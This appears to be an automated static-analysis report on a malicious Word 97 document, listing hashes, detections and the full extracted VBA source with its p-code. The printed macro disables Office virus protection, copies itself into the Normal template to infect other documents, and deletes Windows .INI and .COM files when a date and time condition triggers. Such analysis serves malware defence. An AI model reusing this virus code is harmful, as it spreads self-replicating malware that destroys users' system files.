Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 c241257df28d3084…

MALICIOUS

Office (OLE)

47.0 KB Created: 1998-07-25 19:17:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: c317d7b7610256498f91624e7365d0f3 SHA-1: a4ff0701c7fa2cbfc19fe5bd338120c12cb27f74 SHA-256: c241257df28d308457245f9a5f0708e7afda247e262396eeec07189b559760e7
188 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

This document contains a VBA macro that attempts to export itself to 'C:\ThisDoc.log' and then import it into the Normal template. This action is designed to infect the user's Normal template, allowing the macro to spread to other documents opened by the user. The presence of 'Document_Open' and 'FileSaveAs' macros, along with legacy WordBasic markers, indicates a macro-based infection attempt.

Heuristics 5

  • ClamAV: Doc.Trojan.ZMK-8 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.ZMK-8
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • VBA macro-virus self-replication / AV tampering critical OLE_VBA_MACRO_VIRUS_REPLICATION
    VBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family — self-replicating code with no benign document use, independent of any AV signature.
    Matched line in script
    Options.VirusProtection = False
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    Private Sub Document_Open()
  • Legacy WordBasic macro-virus markers high OLE_LEGACY_WORDBASIC_MACRO_VIRUS
    OLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 9409 bytes
SHA-256: b1ecd3ce5596cf444525de059227c9e952747834ccf763179e768501f10ed1bf
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
Application.EnableCancelKey = wdCancelDisabled
Application.DisplayAlerts = wdAlertsNone
WordBasic.DisableAutoMacros 0
Options.VirusProtection = False
Options.SaveNormalPrompt = False
On Error GoTo ErrorDO
Dim Fichier$
Fichier$ = Dir("C:\ThisDoc.log")
If Fichier$ <> "ThisDoc.log" Then
    Application.VBE.ActiveVBProject.VBComponents("ThisDocument").Export FileName:="C:\ThisDoc.log"
    NormalTemplate.VBProject.VBComponents("ThisDocument").CodeModule.AddFromFile FileName:="C:\ThisDoc.log"
    NormalTemplate.VBProject.VBComponents("ThisDocument").CodeModule.DeleteLines 1, 5
    MsgBox "Attention, ThisDocument est infecté...", vbInformation, "Virus ThisDoc"
End If
ErrorDO:
End Sub
Sub FileSaveAs()
Application.EnableCancelKey = wdCancelDisabled
Application.DisplayAlerts = wdAlertsNone
WordBasic.DisableAutoMacros 0
Options.VirusProtection = False
Options.SaveNormalPrompt = False
On Error GoTo ErrorFSA
    Dialogs(wdDialogFileSaveAs).Show
    If ActiveDocument.SaveFormat = wdFormatTemplate Or ActiveDocument.SaveFormat = wdFormatDocument Then
        ActiveDocument.SaveAs FileFormat:=wdFormatTemplate
    End If
ActiveDocument.VBProject.VBComponents("ThisDocument").CodeModule.AddFromFile FileName:="C:\ThisDoc.log"
ActiveDocument.VBProject.VBComponents("ThisDocument").CodeModule.DeleteLines 1, 5
MsgBox "Je suis une Nouvelle Génération de Virus de Macro...", vbInformation, "Virus ThisDoc"
ErrorFSA:
End Sub
Sub AutoExec()
Application.EnableCancelKey = wdCancelDisabled
Application.DisplayAlerts = wdAlertsNone
WordBasic.DisableAutoMacros 0
Options.VirusProtection = False
Options.SaveNormalPrompt = False
On Error GoTo ErrorAE
Dim MyDate, MyTime
MyDate = Date
MyTime = Time
D$ = Mid(MyDate, 1, 2)
If D$ = "15" Then
    MsgBox "ZeMacroKiller98 est heureux de vous présenter sa nouvelle création...", vbInformation, "Virus ThisDoc"
End If
T$ = Mid(MyTime, 1, 2)
If T$ = D$ Then
    MsgBox "Vos données vont être détruites...", vbCritical, "Virus ThisDoc"
    Kill "C:\Windows\*.INI"
    Kill "C:\Windows\*.COM"
End If
ErrorAE:
End Sub
Sub ToolsMacro()
Application.EnableCancelKey = wdCancelDisabled
Application.DisplayAlerts = wdAlertsNone
WordBasic.DisableAutoMacros 0
Options.VirusProtection = False
Options.SaveNormalPrompt = False
On Error GoTo ErrorTM
    MsgBox "Erreur Système" & Chr$(13) & "Veuillez réessayer plus tard", vbInformation, "Microsoft Word"
ErrorTM:
End Sub
Sub ViewVBCode()
Application.EnableCancelKey = wdCancelDisabled
Application.DisplayAlerts = wdAlertsNone
WordBasic.DisableAutoMacros 0
Options.VirusProtection = False
Options.SaveNormalPrompt = False
On Error GoTo ErrorVVBC
    MsgBox "Ce programme a réalisé une opération illégale et va être interrompu.", vbCritical, "Microsoft Word"
ErrorVVBC:
End Sub

' Processing file: /tmp/qstore_59y3cmzc
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 15500 bytes
' Line #0:
' 	FuncDefn (Private Sub Document_Open())
' Line #1:
' 	Ld wdCancelDisabled 
' 	Ld Application 
' 	MemSt EnableCancelKey 
' Line #2:
' 	Ld wdAlertsNone 
' 	Ld Application 
' 	MemSt DisplayAlerts 
' Line #3:
' 	LitDI2 0x0000 
' 	Ld WordBasic 
' 	ArgsMemCall DisableAutoMacros 0x0001 
' Line #4:
' 	LitVarSpecial (False)
' 	Ld Options 
' 	MemSt VirusProtection 
' Line #5:
' 	LitVarSpecial (False)
' 	Ld Options 
' 	MemSt SaveNormalPrompt 
' Line #6:
' 	OnError ErrorDO 
' Line #7:
' 	Dim 
' 	VarDefn Fichier
' Line #8:
' 	LitStr 0x000E "C:\ThisDoc.log"
' 	ArgsLd Dir 0x0001 
' 	St Fichier$ 
' Line #9:
' 	Ld Fichier$ 
' 	LitStr 0x000B "ThisDoc.log"
' 	Ne 
' 	IfBlock 
' Line #10:
' 	LitStr 0x000E "C:\ThisDoc.log"
' 	ParamNamed FileName 
' 	LitStr 0x000C "ThisDocument"
' 	Ld Application 
' 	MemLd VBE 
' 	MemLd ActiveVBProject 
' 	ArgsMemLd VBComponents 0x0001 
' 	ArgsMemCall Export 0x0001 
' Line #11:
' 	LitStr 0x000E "C:\ThisDoc.log"
' 	ParamNamed FileName 
' 	LitStr 0x000C "ThisDocument"
' 	Ld NormalTemplate 
' 	MemLd VBProject 
' 	ArgsMemLd VBComponents 0x0001 
' 	MemLd CodeModule 
' 	ArgsMemCall AddFromFile 0x0001 
' Line #12:
' 	LitDI2 0x0001 
' 	LitDI2 0x0005 
' 	LitStr 0x000C "ThisDocument"
' 	Ld NormalTemplate 
' 	MemLd VBProject 
' 	ArgsMemLd VBComponents 0x0001 
' 	MemLd CodeModule 
' 	ArgsMemCall DeleteLines 0x0002 
' Line #13:
' 	LitStr 0x0026 "Attention, ThisDocument est infecté..."
' 	Ld vbInformation 
' 	LitStr 0x000D "Virus ThisDoc"
' 	ArgsCall MsgBox 0x0003 
' Line #14:
' 	EndIfBlock 
' Line #15:
' 	Label ErrorDO 
' Line #16:
' 	EndSub 
' Line #17:
' 	FuncDefn (Sub FileSaveAs())
' Line #18:
' 	Ld wdCancelDisabled 
' 	Ld Application 
' 	MemSt EnableCancelKey 
' Line #19:
' 	Ld wdAlertsNone 
' 	Ld Application 
' 	MemSt DisplayAlerts 
' Line #20:
' 	LitDI2 0x0000 
' 	Ld WordBasic 
' 	ArgsMemCall DisableAutoMacros 0x0001 
' Line #21:
' 	LitVarSpecial (False)
' 	Ld Options 
' 	MemSt VirusProtection 
' Line #22:
' 	LitVarSpecial (False)
' 	Ld Options 
' 	MemSt SaveNormalPrompt 
' Line #23:
' 	OnError ErrorFSA 
' Line #24:
' 	Ld wdDialogFileSaveAs 
' 	ArgsLd Dialogs 0x0001 
' 	ArgsMemCall Show 0x0000 
' Line #25:
' 	Ld ActiveDocument 
' 	MemLd SaveFormat 
' 	Ld wdFormatTemplate 
' 	Eq 
' 	Ld ActiveDocument 
' 	MemLd SaveFormat 
' 	Ld wdFormatDocument 
' 	Eq 
' 	Or 
' 	IfBlock 
' Line #26:
' 	Ld wdFormatTemplate 
' 	ParamNamed FileFormat 
' 	Ld ActiveDocument 
' 	ArgsMemCall SaveAs 0x0001 
' Line #27:
' 	EndIfBlock 
' Line #28:
' 	LitStr 0x000E "C:\ThisDoc.log"
' 	ParamNamed FileName 
' 	LitStr 0x000C "ThisDocument"
' 	Ld ActiveDocument 
' 	MemLd VBProject 
' 	ArgsMemLd VBComponents 0x0001 
' 	MemLd CodeModule 
' 	ArgsMemCall AddFromFile 0x0001 
' Line #29:
' 	LitDI2 0x0001 
' 	LitDI2 0x0005 
' 	LitStr 0x000C "ThisDocument"
' 	Ld ActiveDocument 
' 	MemLd VBProject 
' 	ArgsMemLd VBComponents 0x0001 
' 	MemLd CodeModule 
' 	ArgsMemCall DeleteLines 0x0002 
' Line #30:
' 	LitStr 0x0034 "Je suis une Nouvelle Génération de Virus de Macro..."
' 	Ld vbInformation 
' 	LitStr 0x000D "Virus ThisDoc"
' 	ArgsCall MsgBox 0x0003 
' Line #31:
' 	Label ErrorFSA 
' Line #32:
' 	EndSub 
' Line #33:
' 	FuncDefn (Sub AutoExec())
' Line #34:
' 	Ld wdCancelDisabled 
' 	Ld Application 
' 	MemSt EnableCancelKey 
' Line #35:
' 	Ld wdAlertsNone 
' 	Ld Application 
' 	MemSt DisplayAlerts 
' Line #36:
' 	LitDI2 0x0000 
' 	Ld WordBasic 
' 	ArgsMemCall DisableAutoMacros 0x0001 
' Line #37:
' 	LitVarSpecial (False)
' 	Ld Options 
' 	MemSt VirusProtection 
' Line #38:
' 	LitVarSpecial (False)
' 	Ld Options 
' 	MemSt SaveNormalPrompt 
' Line #39:
' 	OnError ErrorAE 
' Line #40:
' 	Dim 
' 	VarDefn MyDate
' 	VarDefn MyTime
' Line #41:
' 	Ld Date 
' 	St MyDate 
' Line #42:
' 	Ld Time 
' 	St MyTime 
' Line #43:
' 	Ld MyDate 
' 	LitDI2 0x0001 
' 	LitDI2 0x0002 
' 	ArgsLd Mid$ 0x0003 
' 	St D$ 
' Line #44:
' 	Ld D$ 
' 	LitStr 0x0002 "15"
' 	Eq 
' 	IfBlock 
' Line #45:
' 	LitStr 0x0045 "ZeMacroKiller98 est heureux de vous présenter sa nouvelle création..."
' 	Ld vbInformation 
' 	LitStr 0x000D "Virus ThisDoc"
' 	ArgsCall MsgBox 0x0003 
' Line #46:
' 	EndIfBlock 
' Line #47:
' 	Ld MyTime 
' 	LitDI2 0x0001 
' 	LitDI2 0x0002 
' 	ArgsLd Mid$ 0x0003 
' 	St T$ 
' Line #48:
' 	Ld T$ 
' 	Ld D$ 
' 	Eq 
' 	IfBlock 
' Line #49:
' 	LitStr 0x0022 "Vos données vont être détruites..."
' 	Ld vbCritical 
' 	LitStr 0x000D "Virus ThisDoc"
' 	ArgsCall MsgBox 0x0003 
' Line #50:
' 	LitStr 0x0010 "C:\Windows\*.INI"
' 	ArgsCall Kill 0x0001 
' Line #51:
' 	LitStr 0x0010 "C:\Windows\*.COM"
' 	ArgsCall Kill 0x0001 
' Line #52:
' 	EndIfBlock 
' Line #53:
' 	Label ErrorAE 
' Line #54:
' 	EndSub 
' Line #55:
' 	FuncDefn (Sub ToolsMacro())
' Line #56:
' 	Ld wdCancelDisabled 
' 	Ld Application 
' 	MemSt EnableCancelKey 
' Line #57:
' 	Ld wdAlertsNone 
' 	Ld Application 
' 	MemSt DisplayAlerts 
' Line #58:
' 	LitDI2 0x0000 
' 	Ld WordBasic 
' 	ArgsMemCall DisableAutoMacros 0x0001 
' Line #59:
' 	LitVarSpecial (False)
' 	Ld Options 
' 	MemSt VirusProtection 
' Line #60:
' 	LitVarSpecial (False)
' 	Ld Options 
' 	MemSt SaveNormalPrompt 
' Line #61:
' 	OnError ErrorTM 
' Line #62:
' 	LitStr 0x000E "Erreur Système"
' 	LitDI2 0x000D 
' 	ArgsLd Chr$ 0x0001 
' 	Concat 
' 	LitStr 0x001C "Veuillez réessayer plus tard"
' 	Concat 
' 	Ld vbInformation 
' 	LitStr 0x000E "Microsoft Word"
' 	ArgsCall MsgBox 0x0003 
' Line #63:
' 	Label ErrorTM 
' Line #64:
' 	EndSub 
' Line #65:
' 	FuncDefn (Sub ViewVBCode())
' Line #66:
' 	Ld wdCancelDisabled 
' 	Ld Application 
' 	MemSt EnableCancelKey 
' Line #67:
' 	Ld wdAlertsNone 
' 	Ld Application 
' 	MemSt DisplayAlerts 
' Line #68:
' 	LitDI2 0x0000 
' 	Ld WordBasic 
' 	ArgsMemCall DisableAutoMacros 0x0001 
' Line #69:
' 	LitVarSpecial (False)
' 	Ld Options 
' 	MemSt VirusProtection 
' Line #70:
' 	LitVarSpecial (False)
' 	Ld Options 
' 	MemSt SaveNormalPrompt 
' Line #71:
' 	OnError ErrorVVBC 
' Line #72:
' 	LitStr 0x0044 "Ce programme a réalisé une opération illégale et va être interrompu."
' 	Ld vbCritical 
' 	LitStr 0x000E "Microsoft Word"
' 	ArgsCall MsgBox 0x0003 
' Line #73:
' 	Label ErrorVVBC 
' Line #74:
' 	EndSub